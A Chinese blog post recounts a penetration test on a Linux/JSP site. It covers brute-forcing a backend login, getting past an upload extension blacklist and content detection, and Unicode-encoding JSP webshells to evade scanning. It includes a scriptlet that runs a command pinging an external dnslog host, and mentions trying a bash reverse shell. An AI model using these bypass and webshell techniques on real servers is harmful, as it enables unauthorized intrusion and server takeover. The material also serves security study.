社区首页 >专栏 >文件上传绕过-getshell

文件上传绕过-getshell

原创

G0mini

发布于 2023-07-12 07:57:33

66300

代码可运行

文章被收录于专栏：极梦C极梦C

运行总次数：0

代码可运行

目标环境

Linux

jsp

黑名单

前言

通过读取js文件，发现后台。然后查看用户名规则，进行爆破。最开始爆破一个，提示已过期，然后根据长度规则，特定去尝试。爆破出一个。然后进行文件上传

文件上传过程

后缀黑名单绕过方式

boundary=    ----WebKitFormxxxxx

疑惑点

上传图片，正常访问。

上传html，正常访问。

上传图片，改名为jsp绕过后无法访问。

继续测试，改名为jspx也是无法访问。

图片上传处有两个按钮，一个是查看，一个是下载。

jsp访问是404

但是可以正常下载。这里猜测应该是上传成功，但是存在内容检查。

内容检测绕过

过程1

上传图片，改名jsp ---404

这个时候就很疑惑。不知道为啥会这样，

难道是后缀和Content-Type不匹配的问题。

jpg:
image/jpeg
jsp:
application/octet-stream

尝试修改Content-Type，上传成功，下载成功。访问404

过程2

没有遇到过，不知为啥会这样，陷入沉思。

难道是内容+Content-Type+后缀匹配才能正常解析访问。

继续fuzz

filename:jsp
Content-Type:application/octet-stream
内容:<% out.println ("helloworld"); %>

上传成功。下载正常，访问404

过程3

感觉没有思路，沉思一会，想起来目标一定是有防护的。

后缀一定是绕过去。那么有问题的一定是内容检测。

想起来，以前jsp内容绕过的时候，一般都会对jsp中的%进行检测。

修改一下上传内容

filename:jsp
Content-Type:application/octet-stream
内容:out.println ("helloworld")；//hello

激动，终于可以访问jsp。离成功又近一步。

过程4

心里想着，只要上传不带%%的jsp马就可以了。

找到之前不带%号的马，成功上传。激动了。

下载正常，访问404！这。。。。

难道是不免杀的问题。这里难过了。自己不会写这种不带%的马子，这可怎么办。

继续思考:

是不是函数被查杀。fuzz一下可以用函数。

java中，当然首选RunTime.getRuntime().exec()命令执行试试。

又一次上传

filename:jsp
Content-Type:application/octet-stream
内容:
<jsp:scriptlet>
Runtime.getRuntime().exec("ping dnslog");
<jsp:scriptlet>

尝试dnslog是不是可以收到。发现可以收到。

目标又是linux是不是就可以反弹了。利用bash。卒。

过程5

看到路了，不过好像又不是路。知识不够，不知道怎么继续下一步了。

沉思一会，还是继续从马的方向入手。一定是可以绕过的。只不过需要找到目标查杀方式。

不过难点是利用jsp:scriptlet，对这个更是不懂。现学可能不够用，放一下。

继续fuzz内容：

在一次无意中测试，发现带%号也可以正常访问。一机灵。
原来不是%检测。那就方便多了。

进行jsp免杀马的测试，发现正常本地可以免杀的马，上传之后就404.难道是内容长度太长了。

小马都无法访问。

继续思考，之前上传成功是利用jsp:scriptlet，然后内容是利用unicode编码才可以成功。

虽然感觉不是对%号检测，但是内容用unicode应该可以绕过。

过程6-成功

ps

JSP Unicode解析特性
在JSP文件中，在除开头部声明处，其他的代码内容均可以使用Unicode代码进行替换
https://docs.oracle.com/javase/specs/jls/se8/html/jls-3.html#jls-UnicodeEscape

免杀马制作:

先正常的免杀马，绕过进行unicode编码。这里需要先看一下上面unicode特性。
然后利用了Eclipse中编码。编码不对会报错。很方便。

编码后上传，下载正常，访问正常。命令执行尝试。

但是利用webshell进行连接的时候，发现无法连接。有点好奇。

因为习惯，马生成的时候，本地都会继续测试，本地都是可以正常连接的。

思考了一下，可能是流量特征，用的都是原生的。

这里看百度改了一下webshell管理工具的一些特征。发现也无法连接。

不知道是不是unicode编码的问题。

后续

免杀马不好整，这里测试了一下哥斯拉和冰蝎马的unicode编码后。

发现哥斯拉unicode编码后，也可以上传成功，可以访问，也是存在连接不了的问题。（未解决）

整体思路

1.根据用户名规则进行爆破。
2.文件上传后缀+内容绕过。
3.耗时一天～～～～

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

渗透测试

安全攻防对抗服务

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

4676

Go 开发者必备：Protocol Buffers 入门指南

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

2934

60页PPT全解：DeepSeek系列论文技术要点整理

4230

Getshell | 文件上传绕过整理

安全网络安全 http html

WAF绕过安全狗绕过 1.绕过思路：对文件的内容，数据。数据包进行处理。关键点在这里Content-Disposition: form-data; name="file"; filename="ian.php" 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-data; name="file"; filename="yjh.php" Content-Type: application/octet

HACK学习

2019/11/14

3.3K0

记一次垃圾字符文件上传绕过WAF

shell tcp/ip jsp java 腾讯云测试服务

在测试项目的时候，网站有WAF，只要输入一些敏感字符就直接封IP 10分钟左右。发现有上传功能，经过不断的测试终于拿到shell。

Khan安全团队

2021/01/11

2.5K0

【文件上传与解析】文件上传与解析漏洞总结v1.0

网络安全安全 php apache nginx

大多数网站都有文件上传的接口，如果没有对上传的文件类型做严格的限制，会导致攻击者可以上传恶意文件。（例如Webshell）

一名白帽的成长史

2019/10/08

1.7K0

超详细文件上传漏洞总结分析

安全网站 iis access php

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集，旨在提高网络安全技术水平为目的，只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试加入交流群讨论或留言私信，如有侵权请联系小编处理。

网络安全自修室

2022/01/24

13.6K0

文件上传漏洞

网络安全 php asp access 安全

文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种漏洞是getShell最快最直接的方法之一。

LuckySec

2022/11/02

2K0

文件上传漏洞超级大汇总-最最终篇

php asp iis html

18、文件名大小写绕过上传限制 1. 首先访问网站页面，如下图： 1. 上传一个test.php文件，发现弹出窗口禁止php上传。如下图所示： 1. 将test.php重命名为test.PhP再次上传

用户1467662

2018/03/30

3.3K0

FastAdmin前台分片传输上传文件getshell复现

php 网络安全安全

FastAdmin 是一款基于 ThinkPHP 5 + Bootstrap 的极速后台开发框架。致力于服务开发者,快速搭建自己属于自己的后台。

Timeline Sec

2021/04/26

6.1K0

记一次绕过waf的文件上传

网站安全编码数据文件上传

由于传播、利用本公众号亿人安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号亿人安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

亿人安全

2023/11/29

5680

文件上传漏洞另类绕过技巧及挖掘案例全汇总

php shell 安全 html jsp

文件上传漏洞作为获取服务器权限最快的方式，虽然相关资料很多，但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述，然后补充一些除了上传webshell的其他非常规挖掘姿势，包括XSS、重定向、Dos、CSRF等等。

Jayway

2019/09/29

7.5K0

简单粗暴的文件上传漏洞

php

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞，因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易，其中有很多技巧，也有很多需要掌握的知识。俗话说，知己知彼方能百战不殆，因此想要研究怎么防护漏洞，就要了解怎么去利用。

信安之路

2018/08/08

4K0

浅谈常见的文件上传的检测方式与绕过方法

网络安全安全 php access apache

文件上传漏洞是我们平时渗透过程中经常利用的漏洞，利用文件上传我们可以直接得到webshell，是非常直接的攻击方式。写这篇文章主要是想对常见的文件上传检测和绕过进行总结，同时练习文件上传php代码的编写。

程序员纬度

2021/03/02

2.3K0

文件上传Bypass安全狗

php html

我们知道WAF分为软WAF，如某狗，某盾等等；云WAF，如阿里云CDN，百度云CDN等等；硬WAF，如天融信，安恒等等，无论是软WAF、云WAF还是硬WAF，总体上绕过的思路都是让WAF无法获取到文件名或者其他方式无法判断我们上传的木马（PHP、JSP、ASP、ASPX等等）。

HACK学习

2021/06/24

1.4K0

文件上传漏洞超级大汇总-第一篇

iis asp nginx 安全 php

先上图，由于太大复制麻烦我分两次贡献出来吧。废话不多说了，直接上正文 1、IIS解析漏洞 1、目录解析(IIS6.0)：建立*.asa 、*.asp格式的文件夹时，其目录下的文件都被当做IIS当做 A

用户1467662

2018/03/30

2.4K0

文件上传

函数后端前端文件上传 text

内容类型，一般指的是网页中存在的Content-Type，用于定义网络文件的类型和网页的编码，决定接收方以什么形式，什么编码解读这个文件

h3110_w0r1d

2024/02/19

5350

经验分享 | 文件上传个人bypass总结

actionscript asp java 安全 DNS 解析 DNSPod

这篇文章也是自己在实战中所遇见的一些总结，各位大师傅估计都知道这些最基础的问题，还是写给小白们的一点学习经验吧。

F12sec

2022/09/29

2.3K0

实战 | 文件上传漏洞之最全代码检测绕过总结

网络安全安全 php iis access

文件上传漏洞是指攻击者上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务端命令的能力。该漏洞在业务应用系统中出现概率较高，究其原因是业务场景中上传附件、头像等功能非常常见，若在系统设计中忽略了相关的安全检查，则容易导致文件上传漏洞。

HACK学习

2022/02/17

15.4K1

Web漏洞 | 文件上传漏洞

php windows 安全网络安全

文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等。

谢公子

2022/01/13

1.7K0

Niushop最新版Getshell

mysql 前端上传图片协议

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

逍遥子大表哥

2021/12/17

6590

冰蝎动态二进制加密WebShell特征分析

java php 爬虫费用中心 http

冰蝎一款新型加密网站管理客户端，在实际的渗透测试过程中有非常不错的效果，能绕过目前市场上的大部分WAF、探针设备。本文将通过在虚拟环境中使用冰蝎，通过wireshark抓取冰蝎通信流量，结合平时在授权渗透中使用冰蝎马经验分析并总结特征。

FB客服

2019/09/24

1.6K0

文件上传靶机实验记录

actionscript http html 安全 access

前端JS后缀名校验，通过审查元素发现onsubmit="return checkFile()”校验函数我们将其删除直接上传（浏览器禁用JS脚本也能上传，BURP抓包更改后缀名也能上传）webshell。

菜菜有点菜

2022/03/18

6.1K0